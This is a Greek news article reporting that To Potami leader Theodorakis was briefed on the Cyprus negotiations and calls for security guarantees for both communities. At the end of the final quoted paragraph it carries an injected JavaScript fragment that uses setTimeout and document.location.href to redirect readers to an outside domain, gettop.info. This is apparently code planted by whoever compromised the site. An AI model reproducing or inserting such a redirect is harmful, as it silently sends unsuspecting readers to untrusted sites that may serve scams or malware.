Θεοδωράκης: Να δοθούν οι εγγυήσεις ασφάλειας για τις δύο κοινότητες

0
4

 

Για τις τελευταίες εξελίξεις στις διαπραγματεύσεις του Κυπριακού ενημερώθηκε από τον πρόεδρο της Κύπρου Νίκου Αναστασιάδη σημειώνοντας «εύχομαι αυτή τη φορά οι προσπάθειες για επίλυση του Κυπριακού να έχουν ένα αίσιο τέλος».

Ο επικεφαλής του Ποταμιού ανέφερε ότι «χωρίς αστερίσκους στηρίζει τη μεγάλη προσπάθεια που κάνει ο Πρόεδρος και οι ηγέτες της Κύπρου για να βρεθεί μια λύση σε ένα πρόβλημα που η διαιώνισή του δεν είναι υπέρ, ούτε των πολιτών της Κύπρου, ούτε της ηρεμίας και της ειρήνης στην περιοχή».

Ο κ. Θεοδωράκης εξέφρασε την άποψη, ότι πλέον έχει στρωθεί ένας δρόμος. «Εμείς βοηθάμε, και όχι μόνο μέσα από τις επίσημες συναντήσεις, τους αδελφούς μας στην Κύπρο για να υπάρξει σύντομα η πολυπόθητη λύση. Να δοθούν οι εγγυήσεις ασφάλειας για τις δύο κοινότητες, για τον πληθυσμό του νησιού και ιδιαίτερα για τους Ελληνοκύπριους που έχουν ζήσει τόσα χρόνια κατοχή. Νομίζω όμως ότι τα προβλήματα που έχουμε μπροστά μας είναι πλέον λιγότερα από αυτά που είναι πίσω μας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here